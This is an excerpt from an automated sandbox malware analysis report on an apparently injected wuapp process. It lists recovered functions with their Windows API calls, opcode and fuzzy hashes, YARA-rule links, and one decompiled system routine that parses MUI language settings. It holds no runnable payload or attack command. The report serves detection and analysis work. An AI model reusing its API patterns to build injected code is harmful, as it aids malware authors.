                                                          Uniqueness Score: -1.00%

                                                          Function 000AA620 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 313 aa620-aa651 call aaf50 RtlAllocateHeap
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(&E,?,000A4C9F,000A4C9F,?,000A4526,?,?,?,?,?,00000000,00000000,?), ref: 000AA64D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_90000_wuapp.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID: &E
                                                          • API String ID: 1279760036-2925179166
                                                          • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                          • Instruction ID: 5d9a57a638c21d519791efc4cf31302aef53861a37975441d3eee2da8c2a9727
                                                          • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                          • Instruction Fuzzy Hash: E1E012B1200208AFDB18EF99CC41EA777ACAF88654F118558BA1C5B282C630F910CAB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000AA660 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 316 aa660-aa676 317 aa67c-aa691 RtlFreeHeap 316->317 318 aa677 call aaf50 316->318 318->317
                                                          APIs
                                                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00093AF8), ref: 000AA68D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_90000_wuapp.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID: .z`
                                                          • API String ID: 3298025750-1441809116
                                                          • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                          • Instruction ID: dbf6c5a137987b03ec5b0357bcbc39bed0b8f2e988b09949dc1d13c5433eb34f
                                                          • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                          • Instruction Fuzzy Hash: 92E012B1200208AFDB18EF99CC49EA777ACAF88750F018558BA1C5B282C630E910CAB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00098309 Relevance: 3.1, APIs: 2, Instructions: 56threadwindowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0009836A
                                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0009838B
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_90000_wuapp.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MessagePostThread
                                                          • String ID:
                                                          • API String ID: 1836367815-0
                                                          • Opcode ID: 1f319cee60a23e887c00d79d1caf730bd7e9068f14c3818fca6188a9136e9a33
                                                          • Instruction ID: 77bac5b5e752cb94ca767d91a61dac4883d8626088ad098e8f8068a6e24a01a8
                                                          • Opcode Fuzzy Hash: 1f319cee60a23e887c00d79d1caf730bd7e9068f14c3818fca6188a9136e9a33
                                                          • Instruction Fuzzy Hash: CF01D871A8022877EF21A6948C43FFE776C6F42F50F044119FF04BA1C2DAA46A0547E6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00098310 Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0009836A
                                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0009838B
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_90000_wuapp.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MessagePostThread
                                                          • String ID:
                                                          • API String ID: 1836367815-0
                                                          • Opcode ID: 3172d27be0b016439e5481d8b21c313a41ffbcab7864ad54bb0489d0eefa33a4
                                                          • Instruction ID: b7cbd778ed55f053df419b748fec978bd73adda4570c40f2ddf3c8fd2e766072
                                                          • Opcode Fuzzy Hash: 3172d27be0b016439e5481d8b21c313a41ffbcab7864ad54bb0489d0eefa33a4
                                                          • Instruction Fuzzy Hash: 8301A271A8022877EB20A6949C03FFE776C6B42F50F054118FF04BA1C3EAE46A0647F6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0009ACE0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0009AD52
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_90000_wuapp.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Load
                                                          • String ID:
                                                          • API String ID: 2234796835-0
                                                          • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                          • Instruction ID: f42e871d4d1b7dc14f92f9939b2a2254f0caf7744680f5e71e86f1cf5c676263
                                                          • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                          • Instruction Fuzzy Hash: A9015EB5E4020DABDF10EAE4DC42FDEB7B89B15308F004195E90997642F630EB14CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000AA6D0 Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 000AA724
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_90000_wuapp.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateInternalProcess
                                                          • String ID:
                                                          • API String ID: 2186235152-0
                                                          • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                          • Instruction ID: 278324c8da01f2f065da0e89ebcb73550aef0c1c67041bf0b8a55fa90ffaf571
                                                          • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                          • Instruction Fuzzy Hash: A001B2B2210108BFCB58DF89DC80EEB77ADAF8C754F158258FA0D97241C630E851CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000A91A0 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0009F040,?,?,00000000), ref: 000A91DC
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_90000_wuapp.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateThread
                                                          • String ID:
                                                          • API String ID: 2422867632-0
                                                          • Opcode ID: ddd11cde9aaf76e4a64e768996f8cd04ed7714866a9f477089f933a3bced0f9e
                                                          • Instruction ID: 2a533c2ed4f3200dcffc9c0dd96d1f174af57afdfcf91464859a8fb8f8c13aac
                                                          • Opcode Fuzzy Hash: ddd11cde9aaf76e4a64e768996f8cd04ed7714866a9f477089f933a3bced0f9e
                                                          • Instruction Fuzzy Hash: 83E06D373902043AE22065D9AC02FE7B39C9B82B20F140026FA0DEB2C2D596F90142A4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000A919A Relevance: 1.5, APIs: 1, Instructions: 30threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0009F040,?,?,00000000), ref: 000A91DC
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_90000_wuapp.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateThread
                                                          • String ID:
                                                          • API String ID: 2422867632-0
                                                          • Opcode ID: c474230f95c30302f2f54f680ebd0a021c67948fa46ea549e868808857975649
                                                          • Instruction ID: 8fd92e18b83bf33336c18973cceffd84ce0ac1e162ca57f37e49498d35253112
                                                          • Opcode Fuzzy Hash: c474230f95c30302f2f54f680ebd0a021c67948fa46ea549e868808857975649
                                                          • Instruction Fuzzy Hash: FBE0927638474136E321A6A96C03FE6AB588F82710F25006AF704AE1C3D5D9A9458266
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000AA7C0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,0009F1C2,0009F1C2,?,00000000,?,?), ref: 000AA7F0
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_90000_wuapp.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LookupPrivilegeValue
                                                          • String ID:
                                                          • API String ID: 3899507212-0
                                                          • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                          • Instruction ID: 4a93d990d7fd6a2f360137dd27ba1caa9dbaa2efb91d2ccffa869a100bbbe044
                                                          • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                          • Instruction Fuzzy Hash: 19E01AB16002086FDB14DF89CC85EE737ADAF89650F018164BA0C57242CA30E8108BF5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0009ACD3 Relevance: 1.5, APIs: 1, Instructions: 22libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0009AD52
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_90000_wuapp.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Load
                                                          • String ID:
                                                          • API String ID: 2234796835-0
                                                          • Opcode ID: 2d0ef61cf7363694f2a5f9cc5c6e3f1be36ab1b03b27b5dd1b575d3d25a48400
                                                          • Instruction ID: ff5a41077bd32ca455201a49fbe4c86a01fe53fa23cb94a8ca093ac77d1e0886
                                                          • Opcode Fuzzy Hash: 2d0ef61cf7363694f2a5f9cc5c6e3f1be36ab1b03b27b5dd1b575d3d25a48400
                                                          • Instruction Fuzzy Hash: 70E04FB5E0010EAADF40DAD4D841F9DB3B4AB44309F008194A91897641E630EA048B91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0009F6B7 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetErrorMode.KERNELBASE(00008003,?,00098D14,?), ref: 0009F6EB
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_90000_wuapp.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorMode
                                                          • String ID:
                                                          • API String ID: 2340568224-0
                                                          • Opcode ID: e79fd08d11b19e2819c1d884b9a689d12867ad8e87ca8e86b3f6458d2da035b0
                                                          • Instruction ID: 85b09a2051d09d377c426e90e1fa6fca4d93879648de2f6e1122e11643b64a1b
                                                          • Opcode Fuzzy Hash: e79fd08d11b19e2819c1d884b9a689d12867ad8e87ca8e86b3f6458d2da035b0
                                                          • Instruction Fuzzy Hash: 6DD05E7A7902002BEA10EBE49D07F662285AB92754F1E08A8F94CEB3C3D966E5158621
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0009F6C0 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetErrorMode.KERNELBASE(00008003,?,00098D14,?), ref: 0009F6EB
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_90000_wuapp.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorMode
                                                          • String ID:
                                                          • API String ID: 2340568224-0
                                                          • Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                                          • Instruction ID: 9c0c29b9252940e65a6d529bfd1b0fa08b361b13211a4bcd829452c380ab0fde
                                                          • Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                                          • Instruction Fuzzy Hash: 6DD0A7767503043BEA10FAE49C03F6633CC6B45B00F490074F948D73C3D954F4004165
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Function 01F88788 Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 94%
                                                          			E01F88788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E01F88460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E01F6E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E01F8718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E01F88460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E01F6E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E01F8718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E01F88460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E01F88460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E01F88460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E01F6E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E01F6E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E01F8718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E01F6E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E01F62340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E01F7E679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E01F6E2A8(_t322,  &_v68, _v16);
								if(E01F85553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E01F7E679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E01F6E2A8(_t322,  &_v68, _t236);
								if(E01F85553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E01F6E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E01F6E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E01F8718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E01F6E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E01F62340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E01F7E679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E01F6E2A8(_v12,  &_v68, _v16);
							if(E01F85553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E01F7E679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E01F6E2A8(_t322,  &_v68, _t269);
							if(E01F85553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E01F6E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E01F6E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E01F8718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E01F6E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E01F62340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E01F7E679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E01F6E2A8(_v12,  &_v68, _v16);
						if(E01F85553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E01F7E679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E01F6E2A8(_t322,  &_v68, _t296);
						if(E01F85553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E01F6E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E01F6E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}





































                                                          0x01f88788
                                                          0x01f88788
                                                          0x01f88791
                                                          0x01f88794
                                                          0x01f88798
                                                          0x01f8879b
                                                          0x01f8879e
                                                          0x01f887a1
                                                          0x01f887a4
                                                          0x01f887a7
                                                          0x01f887aa
                                                          0x01f887af
                                                          0x01fd1ad3
                                                          0x01f88b0a
                                                          0x01f88b0d
                                                          0x01f88b13
                                                          0x01f88b19
                                                          0x01f88b1f
                                                          0x01f88b25
                                                          0x01f88b2b
                                                          0x01f88b31
                                                          0x01f88b37
                                                          0x01f88b3d
                                                          0x01f88b46
                                                          0x01f88b46
                                                          0x01f887c6
                                                          0x01f887d0
                                                          0x01fd1ae0
                                                          0x01fd1ae6
                                                          0x01fd1af8
                                                          0x01fd1af8
                                                          0x01fd1afd
                                                          0x01fd1afe
                                                          0x01fd1b01
                                                          0x01fd1b06
                                                          0x01fd1b06
                                                          0x01f887d6
                                                          0x01f887f2
                                                          0x01f887f7
                                                          0x01f88807
                                                          0x01f8880a
                                                          0x01f8880f
                                                          0x01f88810
                                                          0x01f88813
                                                          0x01f88818
                                                          0x01f88818
                                                          0x01f8882c
                                                          0x01f88831
                                                          0x01f88838
                                                          0x01f88908
                                                          0x01f88920
                                                          0x01f889f0
                                                          0x01f88a08
                                                          0x01f88af6
                                                          0x01f88af6
                                                          0x01f88af8
                                                          0x01f88afb
                                                          0x01fd1beb
                                                          0x01fd1beb
                                                          0x01f88b04
                                                          0x01fd1bf8
                                                          0x01fd1c0e
                                                          0x01fd1c13
                                                          0x01fd1c16
                                                          0x01fd1c16
                                                          0x01fd1bf8
                                                          0x00000000
                                                          0x01f88b04
                                                          0x01f88a0e
                                                          0x01f88a11
                                                          0x01f88a14
                                                          0x01f88a15
                                                          0x01f88a18
                                                          0x01f88a22
                                                          0x01f88b59
                                                          0x01f88a28
                                                          0x01f88a3c
                                                          0x01f88a3c
                                                          0x01f88a42
                                                          0x01fd1bb0
                                                          0x01fd1b11
                                                          0x01fd1b11
                                                          0x00000000
                                                          0x01f88a48
                                                          0x01f88a51
                                                          0x01f88a5b
                                                          0x01f88a5e
                                                          0x01f88a61
                                                          0x01f88a69
                                                          0x01f88a69
                                                          0x01f88a6d
                                                          0x00000000
                                                          0x00000000
                                                          0x01f88a74
                                                          0x01f88a7c
                                                          0x01f88a7d
                                                          0x01f88a91
                                                          0x01f88a93
                                                          0x01f88a93
                                                          0x01f88a98
                                                          0x01f88a9b
                                                          0x01f88aa1
                                                          0x01f88aa1
                                                          0x01f88aa4
                                                          0x01f88aaa
                                                          0x01f88ab1
                                                          0x01f88ac5
                                                          0x01f88ac7
                                                          0x01f88ac7
                                                          0x01f88ac5
                                                          0x01f88ace
                                                          0x01fd1bc9
                                                          0x01fd1bce
                                                          0x01fd1bd2
                                                          0x01fd1bd2
                                                          0x01f88ad8
                                                          0x01f88aeb
                                                          0x01f88aeb
                                                          0x01f88af0
                                                          0x01f88af4
                                                          0x00000000
                                                          0x01f88af4
                                                          0x01f88a42
                                                          0x01f88926
                                                          0x01f88929
                                                          0x01f8892c
                                                          0x01f8892d
                                                          0x01f88930
                                                          0x01f88935
                                                          0x01f8893a
                                                          0x01f88b51
                                                          0x01f88940
                                                          0x01f88954
                                                          0x01f88954
                                                          0x01f8895a
                                                          0x01fd1b63
                                                          0x00000000
                                                          0x01f88960
                                                          0x01f88969
                                                          0x01f88973
                                                          0x01f88976
                                                          0x01f88979
                                                          0x01f8897e
                                                          0x01f88981
                                                          0x01f88981
                                                          0x01f88986
                                                          0x00000000
                                                          0x00000000
                                                          0x01fd1b6e
                                                          0x01fd1b74
                                                          0x01fd1b7b
                                                          0x01fd1b8f
                                                          0x01fd1b91
                                                          0x01fd1b91
                                                          0x01fd1b99
                                                          0x01fd1b9c
                                                          0x01fd1ba2
                                                          0x01fd1ba2
                                                          0x01f8898c
                                                          0x01f88992
                                                          0x01f88999
                                                          0x01f889ad
                                                          0x01fd1ba8
                                                          0x01fd1ba8
                                                          0x01f889ad
                                                          0x01f889b6
                                                          0x01f889c8
                                                          0x01f889cd
                                                          0x01f889d0
                                                          0x01f889d0
                                                          0x01f889d6
                                                          0x01f889e8
                                                          0x01f889e8
                                                          0x01f889ed
                                                          0x00000000
                                                          0x01f889ed
                                                          0x01f8895a
                                                          0x01f8883e
                                                          0x01f88841
                                                          0x01f88844
                                                          0x01f88845
                                                          0x01f88848
                                                          0x01f8884d
                                                          0x01f88852
                                                          0x01f88b49
                                                          0x01f88858
                                                          0x01f8886c
                                                          0x01f8886c
                                                          0x01f88872
                                                          0x01fd1b0e
                                                          0x00000000
                                                          0x01f88878
                                                          0x01f88881
                                                          0x01f8888b
                                                          0x01f8888e
                                                          0x01f88891
                                                          0x01f88896
                                                          0x01f88899
                                                          0x01f88899
                                                          0x01f8889e
                                                          0x00000000
                                                          0x00000000
                                                          0x01fd1b21
                                                          0x01fd1b27
                                                          0x01fd1b2e
                                                          0x01fd1b42
                                                          0x01fd1b44
                                                          0x01fd1b44
                                                          0x01fd1b4c
                                                          0x01fd1b4f
                                                          0x01fd1b55
                                                          0x01fd1b55
                                                          0x01f888a4
                                                          0x01f888aa
                                                          0x01f888b1
                                                          0x01f888c5
                                                          0x01fd1b5b
                                                          0x01fd1b5b
                                                          0x01f888c5
                                                          0x01f888ce
                                                          0x01f888e0
                                                          0x01f888e5
                                                          0x01f888e8
                                                          0x01f888e8
                                                          0x01f888ee
                                                          0x01f88900
                                                          0x01f88900
                                                          0x01f88905
                                                          0x00000000
                                                          0x01f88905

                                                          APIs
                                                          Strings
                                                          • WindowsExcludedProcs, xrefs: 01F887C1
                                                          • Kernel-MUI-Language-Allowed, xrefs: 01F88827
                                                          • Kernel-MUI-Language-SKU, xrefs: 01F889FC
                                                          • Kernel-MUI-Number-Allowed, xrefs: 01F887E6
                                                          • Kernel-MUI-Language-Disallowed, xrefs: 01F88914
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1182422079.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: true
                                                          • Associated: 00000008.00000002.1182415006.0000000001F40000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182509241.0000000002030000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182516090.0000000002040000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182522895.0000000002044000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182529231.0000000002047000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182553465.0000000002050000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182587953.00000000020B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1f40000_wuapp.jbxd
                                                          Similarity
                                                          • API ID: _wcspbrk
